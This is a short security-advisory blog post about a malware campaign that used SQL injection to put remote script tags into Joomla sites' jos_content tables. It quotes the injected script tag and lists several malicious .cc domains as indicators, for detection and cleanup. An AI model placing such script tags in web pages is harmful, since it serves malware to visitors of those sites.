It seems that a good amount of Joomla sites are being infected with malware from the infamous “.cc” domains. All of the hacked sites have the malicious code injected directly in to their databases (SQL injection), via an unknown source (probably a vulnerable extension, but we are still researching the entry point).
This is what is being added to the infected sites (at the top of every post in the jos_content table):
<script type="text/javascript" src="http://yourstatscounter.co.cc/statscounter307.js"></script>
There are many others domains being used in this attack, including:
http://faststatscounter.co.cc/statscounter01935.js
http://yourstatscounter.cz.cc/statscounter301.js
http://yourstatscounter.co.cc/statscounter307.js
http://easystatscounter.co.cc/statscounter12.js
http://supergoogleanalytics.co.cc/
Note that those are different from the Lizamoon SQL injection of a few days ago. The Lizamoon was targeting IIS/ASP.net sites, while this one seems to be targeted only to Joomla sites.
If you are afraid your site might be hacked, check it using our malware scanner. If you need help cleaning it up, let us know.
Val Vesa
Denis Sinegubko
Daniel Cid
Luke Leal
Cesar Anjos
Krasimir Konov
Matt Morrow
1 comment
Maybe this also relates to the “Malware Dot ID – Java Cyber Army” attacks in Australia at the moment. My Website http://ratsoftobrukvictoria.org.au Home Page is one of many attack in recent days.
Comments are closed.